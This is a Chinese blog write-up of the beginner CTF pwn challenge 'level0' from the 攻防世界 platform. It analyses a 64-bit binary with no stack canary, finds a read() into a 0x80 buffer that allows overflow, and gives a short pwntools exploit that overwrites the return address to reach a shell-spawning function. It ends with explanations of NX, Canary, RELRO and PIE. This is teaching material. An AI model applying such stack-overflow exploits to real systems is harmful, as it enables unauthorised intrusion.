攻防世界 level0

已于 2022-07-19 23:55:58 修改
阅读量582 收藏
点赞数 2
分类专栏: pwn 文章标签: 网络安全
于 2022-03-21 22:19:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62539372/article/details/123627488
版权

常规操作:

可以看到no canary found 没有栈保护机制 可以利用栈溢出pwn掉程序(NX,Canary,Relro,PIE保护机制的讲解文末聊)

64位放进ida64分析:

主函数的内容 :write()函数(write函数和read函数文末聊) 

                        返回值是vulnerable_founction函数里的内容

                        点开看一下

返回值是read()函数的内容 有个栈 看一下

 大小为0x80 s 是上一个函数的栈底bp ; r 是返回地址

通过read函数往栈里可写入0x200大小的数据 可产生栈溢出

怎么搞才能拿到shell呢???

shift+f12 看一下关键字符串 聪明的你看到了 bin/sh  这玩意儿相当于cmd 拿到它你就可以为所欲为

有个callsystem的函数 看一下  函数地址 0x400596

 还愣着干什么 写exp哇

from pwn import *

r=remote(远端地址写进去)

payload=b'A'*0x88+p64(0x400596)(p64为什么?? 文末聊)

r.send(payload)

r.interactive()

 文末

NX,Canary,Relro,PIE保护机制的讲解

NX 栈上的数据没有执行权限 防止栈溢出和跳到栈上执行shellcode 有NX的保护堆,栈,bss 段没有执行权限

Canary  在函数开始时就随机产生一个值,将这个值放到栈上紧挨ebp的上一个位置,当攻击者想通过缓冲区溢出覆盖ebp或者ebp下方的返回地址时,一定会覆盖掉CANARY的值;当程序结束时,程序会检查Canary这个值和之前的是否一致,如果不一致,则不会往下运行,从而避免了缓冲区溢出攻击。     防止所有单纯的栈溢出

Relro (ASLR)  堆栈地址随机化 防止所有需要用到堆栈精确地址

partial relro plt指向的got表只读,其他got表可写

full relro got表不可写

PIE  基地址随机化 代码部分地址无关   防止构造ROP链攻击

write函数和read函数

write

write(int fd,&buf,nbyte)

fd 文件描述符 把buf中nbyte写入文件描述符handle所指的文档

read

read(int fd,&buf,nbyte)

读文件描述符handle所指的文档写入buf中

(p64为什么?? 

pwntools提供了把16进制数表示的地址转换成4个字节的字符串的方便函数p32() 就是pack32位地址 64位所以p64

真珠柚子
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界(pwn篇)---level0
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
04-13 1441
攻防世界(pwn篇)—level0 文章目录攻防世界(pwn篇)---level0题目描述基本情况分析运行分析IDA 分析分析出payloadexp 题目描述 菜鸡了解了什么是溢出,他相信自己能得到shell 基本情况分析 发现只开启了 NX(数据不可执行)保护机制,因此可以做栈溢出漏洞攻击。 1.RELRO: RELRP会有Pratial RELRO 和FULL RELRO,如果开启FULL RELRO,意味着我们无法修改got表 2.Stack: Canary found 表示不能直接用溢
攻防世界 pwn 二进制漏洞简单题练习区 答题(1-10题解)
小哈里的博客
01-12 5495
序 1、level0 题目描述:菜鸡了解了什么是溢出,他相信自己能得到shell 题目思路: 首先使用checksec检查文件保护机制,是多少位的程序。 64位程序,栈不能执行 继续丢入IDA。 输出字符串helloWord之后执行vulnerable_function()函数,没有与用户交互。 进入vulnerable_function函数,通过伪代码分析逻辑,发现了栈溢出漏洞。 发现buf数组只有0x80字节,但是read函数从中读了0x200个。 或许咱们能够进行溢出,覆盖掉返回地址,
攻防世界pwn-level0详细步骤
m0_74047686的博客
02-28 1349
学习pwn开始,慢慢来不要急
攻防世界PWN-level0
Deeeelete的博客
11-12 2503
题目:level0 老规矩先进PE 查看是64位程序,可以考虑直接IDA莽,也可以进checksec查一下详细参数 比较脆,无PIE且没了栈保护(Stack-canary),容易GOT改写( RELRO) 简单运行一遍,发现是hello word 进64位IDA 鼠标悬停在main函数上按f5反编译 查看源码: 过于简单,没啥可用的信息,双击它return的脆弱函数进一步查看 int __cdecl main(int argc, const char **argv, const
初学pwn-攻防世界(level0)
天柱的博客
08-27 996
初学pwn-writeUp 攻防世界的第三道题目,level0。 首先还是先创建场景,使用nc进入远端,发现输出了一个Hello,World,之后什么都没有了,使用ls也没有反应,说明这需要我们获取shell了。 下载文件,先用checksec查看一下 这里简单介绍一些checksec这个工具: 1、Relro:No Relro(重定位表只读)   Relocation Read Only, 重定位表只读。重定位表即.got 和 .plt 两个表。   RELRO会有No RELRO、Partial RE
level0 -- 攻防世界新手题
01-19
来自攻防世界的pwn题,是一道简单的新手样本题目,但由于不同linux的libc版本,会使得在ubuntu18.04以及ubuntu20.04中进行漏洞利用产生一些小问题。漏洞利用问题解决链接:https://blog.csdn.net/A951860555/article/details/112849849
攻防世界杂项m0-01
11-13
攻防世界杂项m0_01,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127836871
攻防世界Wire1杂项
11-20
攻防世界Wire1杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127951997
攻防世界流量分析2杂项
11-20
攻防世界流量分析2杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127953659
攻防世界running
11-15
攻防世界running杂项,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127861757
攻防世界Fakezip杂项
11-20
攻防世界Fakezip杂项】是一道网络安全领域中的挑战,属于攻防世界的Misc类问题。Misc( Miscellaneous)通常指的是涉及多种技术、需要综合运用知识的题目,这道题目的核心在于理解和处理压缩文件,特别是涉及到...
攻防世界Check杂项
11-20
攻防世界Check杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127952250
攻防世界encode杂项
11-20
攻防世界encode杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127947807
攻防世界pacp1杂项
11-15
攻防世界pacp1杂项,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127862299
攻防世界nice-bgm杂项
11-20
网络安全领域,"攻防世界"是一个广受欢迎的在线平台,提供各种安全挑战,帮助学习者提升他们的黑客防御和攻击技能。"nice-bgm杂项"是其中的一个挑战,属于"misc"类别,这意味着它可能涉及到多种不同类型的解题技巧...
Linux 二进制程序保护机制详解
潜心习安全
12-06 1934
0x00 检测 可以使用 pwntools 中的 checksec 工具进行检测,红色表示未开启该保护。   0x01 保护 一、ASLR 1.介绍: ASLR 的是操作系统的功能选项,作用于executable(ELF)装入内存运行时,因而只能随机化 stack、heap、libraries 的基址。 2.表现形式 开启后每次加载程序的 stack、libarys、heap 等地址都会随机化,可...
checksec 保护机制
SkYe's Blog
08-13 1255
checksec 保护机制 检查程序保护机制 checksec [filename] 返回保护机制开启情况 Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x8048000)...
【愚公系列】2022年01月 攻防世界-简单题-PWN-001(level0)
热门推荐
时光隧道
01-17 3万+
文章目录一、level0二、答题步骤1.获取在线场景2.查壳3.IDA总结 一、level0 题目链接:https://adworld.xctf.org.cn/task/task_list?type=pwn&number=2&grade=0 二、答题步骤 1.获取在线场景 2.查壳 对下载文件进行查壳,命令如下 file level0 checksec --file=level0 分析文件,小端程序(LSB),栈不可执行。 3.IDA 使用IDA对文件进行反汇编 第一步:首先找到ma
攻防世界新手题(PWN——level0)
0pt1mus
12-19 1106
level0 转载自:superj.site的博客 0x00 首先,进行通过file判断附件文件类型。 判断是ELF文件。这时就可以通过checksec判断文件的保护措施。 得到只开启了执行保护,地址随机化、栈保护都没有开启。 0x01 开始IDA逆向分析。 在其中发现了main、vulnerable_function、callsystem函数逐个查看这三个函数。 发现该题中用到了w...
攻防世界 easyphp
最新发布
09-11
在EasyPHP中,攻防世界是一个基于CTF(Capture The Flag)赛制的在线平台,旨在提供网络安全学习和竞赛的机会。 攻防世界平台上有各种不同的题目和挑战,涵盖了网络安全的多个方面,包括但不限于Web漏洞、系统漏洞...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值